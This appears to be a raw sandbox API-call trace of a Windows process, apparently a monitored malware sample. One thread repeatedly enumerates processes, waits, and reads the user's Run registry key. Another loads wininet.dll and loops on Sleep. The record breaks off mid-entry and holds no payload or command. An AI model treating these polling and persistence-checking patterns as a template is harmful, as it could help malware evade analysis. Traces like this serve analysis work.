NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0191.149] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0191.151] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0191.152] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0191.164] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0xec) returned 0x0 [0191.164] NtEnumerateValueKey (in: KeyHandle=0xec, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0191.164] NtClose (Handle=0xec) returned 0x0 [0191.164] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0191.164] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0191.165] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0191.165] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0191.165] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0191.168] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0191.168] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0191.178] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0xec) returned 0x0 [0191.178] NtEnumerateValueKey (in: KeyHandle=0xec, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0191.178] NtClose (Handle=0xec) returned 0x0 [0191.178] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0191.179] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0191.179] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0191.180] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0191.180] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0191.182] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0191.183] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0191.194] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0xec) returned 0x0 [0191.194] NtEnumerateValueKey (in: KeyHandle=0xec, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0191.194] NtClose (Handle=0xec) returned 0x0 [0191.194] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0191.195] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0191.195] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0191.195] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0191.196] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0191.198] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0191.199] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0191.209] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0xec) returned 0x0 [0191.210] NtEnumerateValueKey (in: KeyHandle=0xec, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0191.210] NtClose (Handle=0xec) returned 0x0 [0191.210] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0191.210] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0191.211] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0191.211] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0191.211] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0191.213] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0191.214] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0191.225] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0xec) returned 0x0 [0191.225] NtEnumerateValueKey (in: KeyHandle=0xec, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0191.225] NtClose (Handle=0xec) returned 0x0 [0191.226] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0191.226] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0191.226] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0191.227] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0191.227] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0191.229] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0191.230] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0191.241] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0xec) returned 0x0 [0191.241] NtEnumerateValueKey (in: KeyHandle=0xec, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0191.241] NtClose (Handle=0xec) returned 0x0 [0191.241] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0191.241] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0191.241] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0191.242] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0191.242] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0191.244] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0191.244] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) Thread: id = 45 os_tid = 0xfa8 Thread: id = 47 os_tid = 0xfc0 [0084.955] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x1d1fed0*=0x0, ZeroBits=0x0, RegionSize=0x1d1fed4*=0x2cc50, AllocationType=0x3000, Protect=0x4 | out: BaseAddress=0x1d1fed0*=0x230000, RegionSize=0x1d1fed4*=0x2d000) returned 0x0 [0084.958] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="wininet.dll", BaseAddress=0x1d1febc | out: BaseAddress=0x1d1febc*=0x765c0000) returned 0x0 [0088.084] Sleep (dwMilliseconds=0x7d0) [0090.092] Sleep (dwMilliseconds=0x7d0) [0092.118] Sleep (dwMilliseconds=0x7d0) [0094.148] Sleep (dwMilliseconds=0x7d0) [0096.164] Sleep (dwMilliseconds=0x7d0) [0098.172] Sleep (dwMilliseconds=0x7d0) [0100.199] Sleep (dwMilliseconds=0x7d0) [0102.292] Sleep (dwMilliseconds=0x7d0) [0104.333] Sleep (dwMilliseconds=0x7d0) [0106.510] Sleep (dwMilliseconds=0x7d0) [0108.514] Sleep (dwMilliseconds=0x7d0) [0108.530] Sleep (dwMilliseconds=0x7d0) [0108.547] Sleep (dwMilliseconds=0x7d0) [0108.561] Sleep (dwMilliseconds=0x7d0) [0108.576] Sleep (dwMilliseconds=0x7d0) [0108.593] Sleep (dwMilliseconds=0x7d0) [0108.607] Sleep (dwMilliseconds=0x7d0) [0108.623] Sleep (dwMilliseconds=0x7d0) [0108.640] Sleep (dwMilliseconds=0x7d0) [0108.656] Sleep (dwMilliseconds=0x7d0) [0108.670] Sleep (dwMilliseconds=0x7d0) [0108.686] Sleep (dwMilliseconds=0x7d0) [0108.702] Sleep (dwMilliseconds=0x7d0) [0108.717] Sleep (dwMilliseconds=0x7d0) [0108.743] Sleep (dwMilliseconds=0x7d0) [0108.752] Sleep (dwMilliseconds=0x7d0) [0108.769] Sleep (dwMilliseconds=0x7d0) [0108.784] Sleep (dwMilliseconds=0x7d0) [0108.799] Sleep (dwMilliseconds=0x7d0) [0108.814] Sleep (dwMilliseconds=0x7d0) [0108.831] Sleep (dwMilliseconds=0x7d0) [0108.846] Sleep (dwMilliseconds=0x7d0) [0108.861] Sleep (dwMilliseconds=0x7d0) [0108.877] Sleep (dwMilliseconds=0x7d0) [0108.908] Sleep (dwMilliseconds=0x7d0) [0108.923] Sleep (dwMilliseconds=0x7d0) [0108.942] Sleep (dwMilliseconds=0x7d0) [0108.955] Sleep (dwMilliseconds=0x7d0) [0108.973] Sleep (dwMilliseconds=0x7d0) [0108.988] Sleep (dwMilliseconds=0x7d0) [0109.001] Sleep (dwMilliseconds=0x7d0) [0109.019] Sleep (dwMilliseconds=0x7d0) [0109.033] Sleep (dwMilliseconds=0x7d0) [0109.049] Sleep (dwMilliseconds=0x7d0) [0109.068] Sleep (dwMilliseconds=0x7d0) [0109.080] Sleep (dwMilliseconds=0x7d0) [0109.100] Sleep (dwMilliseconds=0x7d0) [0109.110] Sleep (dwMilliseconds=0x7d0) [0109.126] Sleep (dwMilliseconds=0x7d0) [0109.143] Sleep (dwMilliseconds=0x7d0) [0109.160] Sleep (dwMilliseconds=0x7d0) [0109.173] Sleep (dwMilliseconds=0x7d0) [0109.192] Sleep (dwMilliseconds=0x7d0) [0109.208] Sleep (dwMilliseconds=0x7d0) [0109.222] Sleep (dwMilliseconds=0x7d0) [0109.236] Sleep (dwMilliseconds=0x7d0) [0109.255] Sleep (dwMilliseconds=0x7d0) [0109.268] Sleep (dwMilliseconds=0x7d0) [0109.288] Sleep (dwMilliseconds=0x7d0) [0109.298] Sleep (dwMilliseconds=0x7d0) [0109.314] Sleep (dwMilliseconds=0x7d0) [0109.332] Sleep (dwMilliseconds=0x7d0) [0109.346] Sleep (dwMilliseconds=0x7d0) [0109.367] Sleep (dwMilliseconds=0x7d0) [0109.380] Sleep (dwMilliseconds=0x7d0) [0109.392] Sleep (dwMilliseconds=0x7d0) [0109.407] Sleep (dwMilliseconds=0x7d0) [0109.423] Sleep (dwMilliseconds=0x7d0) [0109.439] Sleep (dwMilliseconds=0x7d0) [0109.454] Sleep (dwMilliseconds=0x7d0) [0109.471] Sleep (dwMilliseconds=0x7d0) [0109.486] Sleep (dwMilliseconds=0x7d0) [0109.501] Sleep (dwMilliseconds=0x7d0) [0109.516] Sleep (dwMilliseconds=0x7d0) [0109.545] Sleep (dwMilliseconds=0x7d0) [0109.564] Sleep (dwMilliseconds=0x7d0) [0109.579] Sleep (dwMilliseconds=0x7d0) [0109.597] Sleep (dwMilliseconds=0x7d0) [0109.610] Sleep (dwMilliseconds=0x7d0) [0109.627] Sleep (dwMilliseconds=0x7d0) [0109.641] Sleep (dwMilliseconds=0x7d0) [0109.657] Sleep (dwMilliseconds=0x7d0) [0109.673] Sleep (dwMilliseconds=0x7d0) [0109.689] Sleep (dwMilliseconds=0x7d0) [0109.704] Sleep (dwMilliseconds=0x7d0) [0109.719] Sleep (dwMilliseconds=0x7d0) [0109.735] Sleep (dwMilliseconds=0x7d0) [0109.750] Sleep (dwMilliseconds=0x7d0) [0109.765] Sleep (dwMilliseconds=0x7d0) [0109.782] Sleep (dwMilliseconds=0x7d0) [0109.798] Sleep (dwMilliseconds=0x7d0) [0109.813] Sleep (dwMilliseconds=0x7d0) [0109.829] Sleep (dwMilliseconds=0x7d0) [0109.846] Sleep (dwMilliseconds=0x7d0) [0109.861] Sleep (dwMilliseconds=0x7d0) [0109.876] Sleep (dwMilliseconds=0x7d0) [0109.927] Sleep (dwMilliseconds=0x7d0) [0109.948] Sleep (dwMilliseconds=0x7d0) [0109.953] Sleep (dwMilliseconds=0x7d0) [0109.970] Sleep (dwMilliseconds=0x7d0) [0109.985] Sleep (dwMilliseconds=0x7d0) [0110.000] Sleep (dwMilliseconds=0x7d0) [0110.021] Sleep (dwMilliseconds=0x7d0) [0110.032] Sleep (dwMilliseconds=0x7d0) [0110.047] Sleep (dwMilliseconds=0x7d0) [0110.063] Sleep (dwMilliseconds=0x7d0) [0110.080] Sleep (dwMilliseconds=0x7d0) [0110.094] Sleep (dwMilliseconds=0x7d0) [0110.109] Sleep (dwMilliseconds=0x7d0) [0110.126] Sleep (dwMilliseconds=0x7d0) [0110.141] Sleep (dwMilliseconds=0x7d0) [0110.157] Sleep (dwMilliseconds=0x7d0) [0110.173] Sleep (dwMilliseconds=0x7d0) [0110.190] Sleep (dwMilliseconds=0x7d0) [0110.203] Sleep (dwMilliseconds=0x7d0) [0110.219] Sleep (dwMilliseconds=0x7d0) [0110.238] Sleep (dwMilliseconds=0x7d0) [0110.251] Sleep (dwMilliseconds=0x7d0) [0110.266] Sleep (dwMilliseconds=0x7d0) [0110.282] Sleep (dwMilliseconds=0x7d0) [0110.299] Sleep (dwMilliseconds=0x7d0) [0110.315] Sleep (dwMilliseconds=0x7d0) [0110.342] Sleep (dwMilliseconds=0x7d0) [0110.355] Sleep (dwMilliseconds=0x7d0) [0110.545] Sleep (dwMilliseconds=0x7d0) [0110.559] Sleep (dwMilliseconds=0x7d0) [0110.595] Sleep (dwMilliseconds=0x7d0) [0110.608] Sleep (dwMilliseconds=0x7d0) [0110.679] Sleep (dwMilliseconds=0x7d0) [0110.738] Sleep (dwMilliseconds=0x7d0) [0110.786] Sleep (dwMilliseconds=0x7d0) [0110.796] Sleep (dwMilliseconds=0x7d0) [0110.813] Sleep (dwMilliseconds=0x7d0) [0110.836] Sleep (dwMilliseconds=0x7d0) [0110.855] Sleep (dwMilliseconds=0x7d0) [0110.874] Sleep (dwMilliseconds=0x7d0) [0110.894] Sleep (dwMilliseconds=0x7d0) [0110.909] Sleep (dwMilliseconds=0x7d0) [0110.921] Sleep (dwMilliseconds=0x7d0) [0110.942] Sleep (dwMilliseconds=0x7d0) [0110.954] Sleep (dwMilliseconds=0x7d0) [0110.971] Sleep (dwMilliseconds=0x7d0) [0110.986] Sleep (dwMilliseconds=0x7d0) [0111.002] Sleep (dwMilliseconds=0x7d0) [0111.021] Sleep (dwMilliseconds=0x7d0) [0111.033] Sleep (dwMilliseconds=0x7d0) [0111.046] Sleep (dwMilliseconds=0x7d0) [0111.096] Sleep (dwMilliseconds=0x7d0) [0111.115] Sleep (dwMilliseconds=0x7d0) [0111.128] Sleep (dwMilliseconds=0x7d0) [0111.141] Sleep (dwMilliseconds=0x7d0) [0111.174] Sleep (dwMilliseconds=0x7d0) [0111.183] Sleep (dwMilliseconds=0x7d0) [0111.198] Sleep (dwMilliseconds=0x7d0) [0111.215] Sleep (dwMilliseconds=0x7d0) [0111.229] Sleep (dwMilliseconds=0x7d0) [0111.261] Sleep (dwMilliseconds=0x7d0) [0111.270] Sleep (dwMilliseconds=0x7d0) [0111.562] Sleep (dwMilliseconds=0x7d0) [0111.594] Sleep (dwMilliseconds=0x7d0) [0111.614] Sleep (dwMilliseconds=0x7d0) [0111.622] Sleep (dwMilliseconds=0x7d0) [0111.638] Sleep (dwMilliseconds=0x7d0) [0111.654] Sleep (dwMilliseconds=0x7d0) [0111.670] Sleep (dwMilliseconds=0x7d0) [0111.685] Sleep (dwMilliseconds=0x7d0) [0111.701] Sleep (dwMilliseconds=0x7d0) [0111.716] Sleep (dwMilliseconds=0x7d0) [0111.737] Sleep (dwMilliseconds=0x7d0) [0111.760] Sleep (dwMilliseconds=0x7d0) [0111.784] Sleep (dwMilliseconds=0x7d0) [0111.794] Sleep (dwMilliseconds=0x7d0) [0111.810] Sleep (dwMilliseconds=0x7d0) [0111.825] Sleep (dwMilliseconds=0x7d0) [0111.841] Sleep (dwMilliseconds=0x7d0) [0111.856] Sleep (dwMilliseconds=0x7d0) [0111.873] Sleep (dwMilliseconds=0x7d0) [0111.888] Sleep (dwMilliseconds=0x7d0) [0111.904] Sleep (dwMilliseconds=0x7d0) [0111.919] Sleep (dwMilliseconds=0x7d0) [0111.935] Sleep (dwMilliseconds=0x7d0) [0111.951] Sleep (dwMilliseconds=0x7d0) [0111.967] Sleep (dwMilliseconds=0x7d0) [0111.983] Sleep (dwMilliseconds=0x7d0) [0111.999] Sleep (dwMilliseconds=0x7d0) [0112.027] Sleep (dwMilliseconds=0x7d0) [0112.044] Sleep (dwMilliseconds=0x7d0) [0112.060] Sleep (dwMilliseconds=0x7d0) [0112.092] Sleep (dwMilliseconds=0x7d0) [0112.106] Sleep (dwMilliseconds=0x7d0) [0112.122] Sleep (dwMilliseconds=0x7d0) [0112.137] Sleep (dwMilliseconds=0x7d0) [0112.154] Sleep (dwMilliseconds=0x7d0) [0112.169] Sleep (dwMilliseconds=0x7d0) [0112.186] Sleep (dwMilliseconds=0x7d0) [0112.200] Sleep (dwMilliseconds=0x7d0) [0112.217] Sleep (dwMilliseconds=0x7d0) [0112.232] Sleep (dwMilliseconds=0x7d0) [0112.247] Sleep (dwMilliseconds=0x7d0) [0112.264] Sleep (dwMilliseconds=0x7d0) [0112.281] Sleep (dwMilliseconds=0x7d0) [0112.295] Sleep (dwMilliseconds=0x7d0) [0112.327] Sleep (dwMilliseconds=0x7d0) [0112.340] Sleep (dwMilliseconds=0x7d0) [0112.357] Sleep (dwMilliseconds=0x7d0) [0112.371] Sleep (dwMilliseconds=0x7d0) [0112.388] Sleep (dwMilliseconds=0x7d0) [0112.404] Sleep (dwMilliseconds=0x7d0) [0112.419] Sleep (dwMilliseconds=0x7d0) [0112.435] Sleep (dwMilliseconds=0x7d0) [0112.450] Sleep (dwMilliseconds=0x7d0) [0112.466] Sleep (dwMilliseconds=0x7d0) [0112.484] Sleep (dwMilliseconds=0x7d0) [0112.495] Sleep (dwMilliseconds=0x7d0) [0112.514] Sleep (dwMilliseconds=0x7d0) [0112.529] Sleep (dwMilliseconds=0x7d0) [0112.543] Sleep (dwMilliseconds=0x7d0) [0112.562] Sleep (dwMilliseconds=0x7d0) [0112.573] Sleep (dwMilliseconds=0x7d0) [0112.589] Sleep (dwMilliseconds=0x7d0) [0112.605] Sleep (dwMilliseconds=0x7d0) [0112.622] Sleep (dwMilliseconds=0x7d0) [0112.638] Sleep (dwMilliseconds=0x7d0) [0112.652] Sleep (dwMilliseconds=0x7d0) [0112.670] Sleep (dwMilliseconds=0x7d0) [0112.686] Sleep (dwMilliseconds=0x7d0) [0112.698] Sleep (dwMilliseconds=0x7d0) [0112.715] Sleep (dwMilliseconds=0x7d0) [0112.733] Sleep (dwMilliseconds=0x7d0) [0112.748] Sleep (dwMilliseconds=0x7d0) [0112.765] Sleep (dwMilliseconds=0x7d0) [0112.777] Sleep (dwMilliseconds=0x7d0) [0112.795] Sleep (dwMilliseconds=0x7d0) [0112.809] Sleep (dwMilliseconds=0x7d0) [0112.825] Sleep (dwMilliseconds=0x7d0) [0112.839] Sleep (dwMilliseconds=0x7d0) [0112.858] Sleep (dwMilliseconds=0x7d0) [0112.872] Sleep (dwMilliseconds=0x7d0) [0112.888] Sleep (dwMilliseconds=0x7d0) [0112.902] Sleep (dwMilliseconds=0x7d0) [0112.919] Sleep (dwMilliseconds=0x7d0) [0112.934] Sleep (dwMilliseconds=0x7d0) [0112.950] Sleep (dwMilliseconds=0x7d0) [0112.966] Sleep (dwMilliseconds=0x7d0) [0112.980] Sleep (dwMilliseconds=0x7d0) [0112.995] Sleep (dwMilliseconds=0x7d0) [0113.011] Sleep (dwMilliseconds=0x7d0) [0113.027] Sleep (dwMilliseconds=0x7d0) [0113.044] Sleep (dwMilliseconds=0x7d0) [0113.058] Sleep (dwMilliseconds=0x7d0) [0113.073] Sleep (dwMilliseconds=0x7d0) [0113.092] Sleep (dwMilliseconds=0x7d0) [0113.105] Sleep (dwMilliseconds=0x7d0) [0113.127] Sleep (dwMilliseconds=0x7d0) [0113.136] Sleep (dwMilliseconds=0x7d0) [0113.152] Sleep (dwMilliseconds=0x7d0) [0113.167] Sleep (dwMilliseconds=0x7d0) [0113.184] Sleep (dwMilliseconds=0x7d0) [0113.199] Sleep (dwMilliseconds=0x7d0) [0113.214] Sleep (dwMilliseconds=0x7d0) [0113.230] Sleep (dwMilliseconds=0x7d0) [0113.245] Sleep (dwMilliseconds=0x7d0) [0113.261] Sleep (dwMilliseconds=0x7d0) [0113.277] Sleep (dwMilliseconds=0x7d0) [0113.293] Sleep (dwMilliseconds=0x7d0) [0113.329] Sleep (dwMilliseconds=0x7d0) [0113.338] Sleep (dwMilliseconds=0x7d0) [0113.355] Sleep (dwMilliseconds=0x7d0) [0113.372] Sleep (dwMilliseconds=0x7d0) [0113.386] Sleep (dwMilliseconds=0x7d0) [0113.402] Sleep (dwMilliseconds=0x7d0) [0113.417] Sleep (dwMilliseconds=0x7d0) [0113.433] Sleep (dwMilliseconds=0x7d0) [0113.448] Sleep (dwMilliseconds=0x7d0) [0113.464] Sleep (dwMilliseconds=0x7d0) [0113.480] Sleep (dwMilliseconds=0x7d0) [0113.495] Sleep (dwMilliseconds=0x7d0) [0113.511] Sleep (dwMilliseconds=0x7d0) [0113.526] Sleep (dwMilliseconds=0x7d0) [0113.542] Sleep (dwMilliseconds=0x7d0) [0113.559] Sleep (dwMilliseconds=0x7d0) [0113.573] Sleep (dwMilliseconds=0x7d0) [0113.594] Sleep (dwMilliseconds=0x7d0) [0113.605] Sleep (dwMilliseconds=0x7d0) [0113.622] Sleep (dwMilliseconds=0x7d0) [0113.636] Sleep (dwMilliseconds=0x7d0) [0113.664] Sleep (dwMilliseconds=0x7d0) [0113.682] Sleep (dwMilliseconds=0x7d0) [0113.698] Sleep (dwMilliseconds=0x7d0) [0113.718] Sleep (dwMilliseconds=0x7d0) [0113.729] Sleep (dwMilliseconds=0x7d0) [0113.776] Sleep (dwMilliseconds=0x7d0) [0113.791] Sleep (dwMilliseconds=0x7d0) [0113.809] Sleep (dwMilliseconds=0x7d0) [0113.834] Sleep 